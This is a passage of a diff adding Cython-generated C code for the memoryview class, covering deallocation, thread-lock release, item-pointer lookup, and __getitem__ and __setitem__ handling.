__pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":376 + * self.typeinfo = NULL + * + * def __dealloc__(memoryview self): # <<<<<<<<<<<<<< + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) + */ + +/* Python wrapper */ +static void __pyx_memoryview___dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_memoryview___dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_2__dealloc__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_2__dealloc__(struct __pyx_memoryview_obj *__pyx_v_self) { + int __pyx_v_i; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + PyThread_type_lock __pyx_t_5; + PyThread_type_lock __pyx_t_6; + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "View.MemoryView":377 + * + * def __dealloc__(memoryview self): + * if self.obj is not None: # <<<<<<<<<<<<<< + * __Pyx_ReleaseBuffer(&self.view) + * elif (<__pyx_buffer *> &self.view).obj == Py_None: + */ + __pyx_t_1 = (__pyx_v_self->obj != Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":378 + * def __dealloc__(memoryview self): + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) # <<<<<<<<<<<<<< + * elif (<__pyx_buffer *> &self.view).obj == Py_None: + * + */ + __Pyx_ReleaseBuffer((&__pyx_v_self->view)); + + /* "View.MemoryView":377 + * + * def __dealloc__(memoryview self): + * if self.obj is not None: # <<<<<<<<<<<<<< + * __Pyx_ReleaseBuffer(&self.view) + * elif (<__pyx_buffer *> &self.view).obj == Py_None: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":379 + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) + * elif (<__pyx_buffer *> &self.view).obj == Py_None: # <<<<<<<<<<<<<< + * + * (<__pyx_buffer *> &self.view).obj = NULL + */ + __pyx_t_1 = (((Py_buffer *)(&__pyx_v_self->view))->obj == Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":381 + * elif (<__pyx_buffer *> &self.view).obj == Py_None: + * + * (<__pyx_buffer *> &self.view).obj = NULL # <<<<<<<<<<<<<< + * Py_DECREF(Py_None) + * + */ + ((Py_buffer *)(&__pyx_v_self->view))->obj = NULL; + + /* "View.MemoryView":382 + * + * (<__pyx_buffer *> &self.view).obj = NULL + * Py_DECREF(Py_None) # <<<<<<<<<<<<<< + * + * cdef int i + */ + Py_DECREF(Py_None); + + /* "View.MemoryView":379 + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) + * elif (<__pyx_buffer *> &self.view).obj == Py_None: # <<<<<<<<<<<<<< + * + * (<__pyx_buffer *> &self.view).obj = NULL + */ + } + __pyx_L3:; + + /* "View.MemoryView":386 + * cdef int i + * global __pyx_memoryview_thread_locks_used + * if self.lock != NULL: # <<<<<<<<<<<<<< + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: + */ + __pyx_t_1 = (__pyx_v_self->lock != NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":387 + * global __pyx_memoryview_thread_locks_used + * if self.lock != NULL: + * for i in range(__pyx_memoryview_thread_locks_used): # <<<<<<<<<<<<<< + * if __pyx_memoryview_thread_locks[i] is self.lock: + * __pyx_memoryview_thread_locks_used -= 1 + */ + __pyx_t_2 = __pyx_memoryview_thread_locks_used; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":388 + * if self.lock != NULL: + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: + */ + __pyx_t_1 = ((__pyx_memoryview_thread_locks[__pyx_v_i]) == __pyx_v_self->lock); + if (__pyx_t_1) { + + /* "View.MemoryView":389 + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: + * __pyx_memoryview_thread_locks_used -= 1 # <<<<<<<<<<<<<< + * if i != __pyx_memoryview_thread_locks_used: + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + */ + __pyx_memoryview_thread_locks_used = (__pyx_memoryview_thread_locks_used - 1); + + /* "View.MemoryView":390 + * if __pyx_memoryview_thread_locks[i] is self.lock: + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) + */ + __pyx_t_1 = (__pyx_v_i != __pyx_memoryview_thread_locks_used); + if (__pyx_t_1) { + + /* "View.MemoryView":392 + * if i != __pyx_memoryview_thread_locks_used: + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) # <<<<<<<<<<<<<< + * break + * else: + */ + __pyx_t_5 = (__pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used]); + __pyx_t_6 = (__pyx_memoryview_thread_locks[__pyx_v_i]); + + /* "View.MemoryView":391 + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) + * break + */ + (__pyx_memoryview_thread_locks[__pyx_v_i]) = __pyx_t_5; + (__pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used]) = __pyx_t_6; + + /* "View.MemoryView":390 + * if __pyx_memoryview_thread_locks[i] is self.lock: + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) + */ + } + + /* "View.MemoryView":393 + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) + * break # <<<<<<<<<<<<<< + * else: + * PyThread_free_lock(self.lock) + */ + goto __pyx_L6_break; + + /* "View.MemoryView":388 + * if self.lock != NULL: + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: + */ + } + } + /*else*/ { + + /* "View.MemoryView":395 + * break + * else: + * PyThread_free_lock(self.lock) # <<<<<<<<<<<<<< + * + * cdef char *get_item_pointer(memoryview self, object index) except NULL: + */ + PyThread_free_lock(__pyx_v_self->lock); + } + __pyx_L6_break:; + + /* "View.MemoryView":386 + * cdef int i + * global __pyx_memoryview_thread_locks_used + * if self.lock != NULL: # <<<<<<<<<<<<<< + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: + */ + } + + /* "View.MemoryView":376 + * self.typeinfo = NULL + * + * def __dealloc__(memoryview self): # <<<<<<<<<<<<<< + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":397 + * PyThread_free_lock(self.lock) + * + * cdef char *get_item_pointer(memoryview self, object index) except NULL: # <<<<<<<<<<<<<< + * cdef Py_ssize_t dim + * cdef char *itemp = self.view.buf + */ + +static char *__pyx_memoryview_get_item_pointer(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index) { + Py_ssize_t __pyx_v_dim; + char *__pyx_v_itemp; + PyObject *__pyx_v_idx = NULL; + char *__pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + Py_ssize_t __pyx_t_3; + PyObject *(*__pyx_t_4)(PyObject *); + PyObject *__pyx_t_5 = NULL; + Py_ssize_t __pyx_t_6; + char *__pyx_t_7; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_item_pointer", 0); + + /* "View.MemoryView":399 + * cdef char *get_item_pointer(memoryview self, object index) except NULL: + * cdef Py_ssize_t dim + * cdef char *itemp = self.view.buf # <<<<<<<<<<<<<< + * + * for dim, idx in enumerate(index): + */ + __pyx_v_itemp = ((char *)__pyx_v_self->view.buf); + + /* "View.MemoryView":401 + * cdef char *itemp = self.view.buf + * + * for dim, idx in enumerate(index): # <<<<<<<<<<<<<< + * itemp = pybuffer_index(&self.view, itemp, idx, dim) + * + */ + __pyx_t_1 = 0; + if (likely(PyList_CheckExact(__pyx_v_index)) || PyTuple_CheckExact(__pyx_v_index)) { + __pyx_t_2 = __pyx_v_index; __Pyx_INCREF(__pyx_t_2); __pyx_t_3 = 0; + __pyx_t_4 = NULL; + } else { + __pyx_t_3 = -1; __pyx_t_2 = PyObject_GetIter(__pyx_v_index); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 401, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 401, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_4)) { + if (likely(PyList_CheckExact(__pyx_t_2))) { + if (__pyx_t_3 >= PyList_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_5 = PyList_GET_ITEM(__pyx_t_2, __pyx_t_3); __Pyx_INCREF(__pyx_t_5); __pyx_t_3++; if (unlikely((0 < 0))) __PYX_ERR(1, 401, __pyx_L1_error) + #else + __pyx_t_5 = PySequence_ITEM(__pyx_t_2, __pyx_t_3); __pyx_t_3++; if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 401, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + #endif + } else { + if (__pyx_t_3 >= PyTuple_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_5 = PyTuple_GET_ITEM(__pyx_t_2, __pyx_t_3); __Pyx_INCREF(__pyx_t_5); __pyx_t_3++; if (unlikely((0 < 0))) __PYX_ERR(1, 401, __pyx_L1_error) + #else + __pyx_t_5 = PySequence_ITEM(__pyx_t_2, __pyx_t_3); __pyx_t_3++; if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 401, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + #endif + } + } else { + __pyx_t_5 = __pyx_t_4(__pyx_t_2); + if (unlikely(!__pyx_t_5)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(1, 401, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_5); + } + __Pyx_XDECREF_SET(__pyx_v_idx, __pyx_t_5); + __pyx_t_5 = 0; + __pyx_v_dim = __pyx_t_1; + __pyx_t_1 = (__pyx_t_1 + 1); + + /* "View.MemoryView":402 + * + * for dim, idx in enumerate(index): + * itemp = pybuffer_index(&self.view, itemp, idx, dim) # <<<<<<<<<<<<<< + * + * return itemp + */ + __pyx_t_6 = __Pyx_PyIndex_AsSsize_t(__pyx_v_idx); if (unlikely((__pyx_t_6 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 402, __pyx_L1_error) + __pyx_t_7 = __pyx_pybuffer_index((&__pyx_v_self->view), __pyx_v_itemp, __pyx_t_6, __pyx_v_dim); if (unlikely(__pyx_t_7 == ((char *)NULL))) __PYX_ERR(1, 402, __pyx_L1_error) + __pyx_v_itemp = __pyx_t_7; + + /* "View.MemoryView":401 + * cdef char *itemp = self.view.buf + * + * for dim, idx in enumerate(index): # <<<<<<<<<<<<<< + * itemp = pybuffer_index(&self.view, itemp, idx, dim) + * + */ + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "View.MemoryView":404 + * itemp = pybuffer_index(&self.view, itemp, idx, dim) + * + * return itemp # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = __pyx_v_itemp; + goto __pyx_L0; + + /* "View.MemoryView":397 + * PyThread_free_lock(self.lock) + * + * cdef char *get_item_pointer(memoryview self, object index) except NULL: # <<<<<<<<<<<<<< + * cdef Py_ssize_t dim + * cdef char *itemp = self.view.buf + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("View.MemoryView.memoryview.get_item_pointer", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_idx); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":407 + * + * + * def __getitem__(memoryview self, object index): # <<<<<<<<<<<<<< + * if index is Ellipsis: + * return self + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview___getitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_index); /*proto*/ +static PyObject *__pyx_memoryview___getitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_index) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getitem__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_4__getitem__(((struct __pyx_memoryview_obj *)__pyx_v_self), ((PyObject *)__pyx_v_index)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_4__getitem__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index) { + PyObject *__pyx_v_have_slices = NULL; + PyObject *__pyx_v_indices = NULL; + char *__pyx_v_itemp; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + char *__pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__getitem__", 0); + + /* "View.MemoryView":408 + * + * def __getitem__(memoryview self, object index): + * if index is Ellipsis: # <<<<<<<<<<<<<< + * return self + * + */ + __pyx_t_1 = (__pyx_v_index == __pyx_builtin_Ellipsis); + if (__pyx_t_1) { + + /* "View.MemoryView":409 + * def __getitem__(memoryview self, object index): + * if index is Ellipsis: + * return self # <<<<<<<<<<<<<< + * + * have_slices, indices = _unellipsify(index, self.view.ndim) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_self); + __pyx_r = ((PyObject *)__pyx_v_self); + goto __pyx_L0; + + /* "View.MemoryView":408 + * + * def __getitem__(memoryview self, object index): + * if index is Ellipsis: # <<<<<<<<<<<<<< + * return self + * + */ + } + + /* "View.MemoryView":411 + * return self + * + * have_slices, indices = _unellipsify(index, self.view.ndim) # <<<<<<<<<<<<<< + * + * cdef char *itemp + */ + __pyx_t_2 = _unellipsify(__pyx_v_index, __pyx_v_self->view.ndim); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 411, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (likely(__pyx_t_2 != Py_None)) { + PyObject* sequence = __pyx_t_2; + Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); + if (unlikely(size != 2)) { + if (size > 2) __Pyx_RaiseTooManyValuesError(2); + else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); + __PYX_ERR(1, 411, __pyx_L1_error) + } + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_3 = PyTuple_GET_ITEM(sequence, 0); + __pyx_t_4 = PyTuple_GET_ITEM(sequence, 1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + #else + __pyx_t_3 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 411, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 411, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } else { + __Pyx_RaiseNoneNotIterableError(); __PYX_ERR(1, 411, __pyx_L1_error) + } + __pyx_v_have_slices = __pyx_t_3; + __pyx_t_3 = 0; + __pyx_v_indices = __pyx_t_4; + __pyx_t_4 = 0; + + /* "View.MemoryView":414 + * + * cdef char *itemp + * if have_slices: # <<<<<<<<<<<<<< + * return memview_slice(self, indices) + * else: + */ + __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_v_have_slices); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 414, __pyx_L1_error) + if (__pyx_t_1) { + + /* "View.MemoryView":415 + * cdef char *itemp + * if have_slices: + * return memview_slice(self, indices) # <<<<<<<<<<<<<< + * else: + * itemp = self.get_item_pointer(indices) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = ((PyObject *)__pyx_memview_slice(__pyx_v_self, __pyx_v_indices)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 415, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":414 + * + * cdef char *itemp + * if have_slices: # <<<<<<<<<<<<<< + * return memview_slice(self, indices) + * else: + */ + } + + /* "View.MemoryView":417 + * return memview_slice(self, indices) + * else: + * itemp = self.get_item_pointer(indices) # <<<<<<<<<<<<<< + * return self.convert_item_to_object(itemp) + * + */ + /*else*/ { + __pyx_t_5 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->get_item_pointer(__pyx_v_self, __pyx_v_indices); if (unlikely(__pyx_t_5 == ((char *)NULL))) __PYX_ERR(1, 417, __pyx_L1_error) + __pyx_v_itemp = __pyx_t_5; + + /* "View.MemoryView":418 + * else: + * itemp = self.get_item_pointer(indices) + * return self.convert_item_to_object(itemp) # <<<<<<<<<<<<<< + * + * def __setitem__(memoryview self, object index, object value): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->convert_item_to_object(__pyx_v_self, __pyx_v_itemp); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 418, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + } + + /* "View.MemoryView":407 + * + * + * def __getitem__(memoryview self, object index): # <<<<<<<<<<<<<< + * if index is Ellipsis: + * return self + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.memoryview.__getitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_have_slices); + __Pyx_XDECREF(__pyx_v_indices); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":420 + * return self.convert_item_to_object(itemp) + * + * def __setitem__(memoryview self, object index, object value): # <<<<<<<<<<<<<< + * if self.view.readonly: + * raise TypeError, "Cannot assign to read-only memoryview" + */ + +/* Python wrapper */ +static int __pyx_memoryview___setitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_memoryview___setitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setitem__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_6__setitem__(((struct __pyx_memoryview_obj *)__pyx_v_self), ((PyObject *)__pyx_v_index), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_6__setitem__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value) { + PyObject *__pyx_v_have_slices = NULL; + PyObject *__pyx_v_obj = NULL; + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setitem__", 0); + __Pyx_INCREF(__pyx_v_index); + + /* "View.MemoryView":421 + * + * def __setitem__(memoryview self, object index, object value): + * if self.view.readonly: # <<<<<<<<<<<<<< + * raise TypeError, "Cannot assign to read-only memoryview" + * + */ + if (unlikely(__pyx_v_self->view.readonly)) { + + /* "View.MemoryView":422 + * def __setitem__(memoryview self, object index, object value): + * if self.view.readonly: + * raise TypeError, "Cannot assign to read-only memoryview" # <<<<<<<<<<<<<< + * + * have_slices, index = _unellipsify(index, self.view.ndim) + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_Cannot_assign_to_read_only_memor, 0, 0); + __PYX_ERR(1, 422, __pyx_L1_error) + + /* "View.MemoryView":421 + * + * def __setitem__(memoryview self, object index, object value): + * if self.view.readonly: # <<<<<<<<<<<<<< + * raise TypeError, "Cannot assign to read-only memoryview" + * + */ + } + + /* "View.MemoryView":424 + * raise TypeError, "Cannot assign to read-only memoryview" + * + * have_slices, index = _unellipsify(index, self.view.ndim) # <<<<<<<<<<<<<< + * + * if have_slices: + */ + __pyx_t_1 = _unellipsify(__pyx_v_index, __pyx_v_self->view.ndim); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 424, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + if (likely(__pyx_t_1 != Py_None)) { + PyObject* sequence = __pyx_t_1; + Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); + if (unlikely(size != 2)) { + if (size > 2) __Pyx_RaiseTooManyValuesError(2); + else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); + __PYX_ERR(1, 424, __pyx_L1_error) + } + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); + __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); + __Pyx_INCREF(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + #else + __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 424, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 424, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + #endif + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } else { + __Pyx_RaiseNoneNotIterableError(); __PYX_ERR(1, 424, __pyx_L1_error) + } + __pyx_v_have_slices = __pyx_t_2; + __pyx_t_2 = 0; + __Pyx_DECREF_SET(__pyx_v_index, __pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":426 + * have_slices, index = _unellipsify(index, self.view.ndim) + * + * if have_slices: # <<<<<<<<<<<<<< + * obj = self.is_slice(value) + * if obj: + */ + __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_v_have_slices); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(1, 426, __pyx_L1_error) + if (__pyx_t_4) { + + /* "View.MemoryView":427 + * + * if have_slices: + * obj = self.is_slice(value) # <<<<<<<<<<<<<< + * if obj: + * self.setitem_slice_assignment(self[index], obj) + */ + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->is_slice(__pyx_v_self, __pyx_v_value); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 427, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_obj = __pyx_t_1; + __pyx_t_1 = 0; + + /* "View.MemoryView":428 + * if have_slices: + * obj = self.is_slice(value) + * if obj: # <<<<<<<<<<<<<< + * self.setitem_slice_assignment(self[index], obj) + * else: + */ + __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_v_obj); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(1, 428, __pyx_L1_error) + if (__pyx_t_4) { + + /* "View.MemoryView":429 + * obj = self.is_slice(value) + * if obj: + * self.setitem_slice_assignment(self[index], obj) # <<<<<<<<<<<<<< + * else: + * self.setitem_slice_assign_scalar(self[index], value) + */ + __pyx_t_1 = __Pyx_PyObject_GetItem(((PyObject *)__pyx_v_self), __pyx_v_index); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 429, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->setitem_slice_assignment(__pyx_v_self, __pyx_t_1, __pyx_v_obj); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 429, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "View.MemoryView":428 + * if have_slices: + * obj = self.is_slice(value) + * if obj: # <<<<<<<<<<<<<< + * self.setitem_slice_assignment(self[index], obj) + * else: + */ + goto __pyx_L5; + } + + /* "View.MemoryView":431 + * self.setitem_slice_assignment(self[index], obj) + * else: + * self.setitem_slice_assign_scalar(self[index], value) # <<<<<<<<<<<<<< + * else: + * self.setitem_indexed(index, value) + */ + /*else*/ { + __pyx_t_3 = __Pyx_PyObject_GetItem(((PyObject *)__pyx_v_self), __pyx_v_index); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 431, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (!(likely(((__pyx_t_3) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_3, __pyx_memoryview_type))))) __PYX_ERR(1, 431, __pyx_L1_error) + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->setitem_slice_assign_scalar(__pyx_v_self, ((struct __pyx_memoryview_obj *)__pyx_t_3), __pyx_v_value); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 431, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_L5:; + + /* "View.MemoryView":426 + * have_slices, index = _unellipsify(index, self.view.ndim) + * + * if have_slices: # <<<<<<<<<<<<<< + * obj = self.is_slice(value) + * if obj: + */ + goto __pyx_L4; + } + + /* "View.MemoryView":433 + * self.setitem_slice_assign_scalar(self[index], value) + * else: + * self.setitem_indexed(index, value) # <<<<<<<<<<<<<< + * + * cdef is_slice(self, obj): + */ + /*else*/ { + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->setitem_indexed(__pyx_v_self, __pyx_v_index, __pyx_v_value); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 433, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_L4:; + + /* "View.MemoryView":420 + * return self.convert_item_to_object(itemp) + * + * def __setitem__(memoryview self, object index, object value): # <<<<<<<<<<<<<< + * if self.view.readonly: + * raise TypeError, "Cannot assign to read-only memoryview" + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + 